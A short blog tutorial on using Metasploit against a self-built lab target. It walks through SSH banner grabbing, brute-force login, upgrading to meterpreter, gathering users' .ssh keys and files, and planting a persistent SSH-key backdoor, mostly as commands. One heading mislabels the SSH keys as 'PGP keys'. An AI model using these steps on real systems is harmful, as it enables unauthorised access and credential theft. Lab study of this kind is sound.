Jirairya

SSH Penetration Testing with msf

2017-10-10

Set up a target machine and use msf to run an SSH penetration test against it.

Setting Up the Environment

Install openssh

sudo apt-get install openssh-server

Grabbing the SSH Banner

nmap:

nmap -sV 192.168.222.147

Using msf's db_nmap:

msf > db_status

msf > db_nmap -sV 192.168.222.147

Using an msf auxiliary module to query the version number:

msf > use auxiliary/scanner/ssh/ssh_version 

msf auxiliary(ssh_version) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147


msf auxiliary(ssh_version) > exploit 

Brute Forcing

msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147

msf auxiliary(ssh_login) > set USERPASS_FILE /root/Desktop/di.txt
USERPASS_FILE => /root/Desktop/di.txt

msf auxiliary(ssh_login) > exploit

msf auxiliary(ssh_login) > sessions 1
[*] Starting interaction with 1...

ifconfig

Run the following commands to obtain a meterpreter session:

sessions -u 2
sessions -l

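Stealing PGP Keys to Log In over ssh

Collect the contents of every user's .ssh directory on the target machine, and download known_hosts, authorized_keys and any other files: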

msf post(sshkey_persistence) > use post/multi/gather/ssh_creds 
msf post(ssh_creds) > set sessions 2
sessions => 2
msf post(ssh_creds) > exploit 

Creating a Persistent Backdoor

Add an ssh key to a specified user, so that remote login over ssh becomes possible:

msf post(ssh_creds) > use post/linux/manage/sshkey_persistence 
msf post(sshkey_persistence) > set sessions 2
sessions => 2
msf post(sshkey_persistence) > exploit 

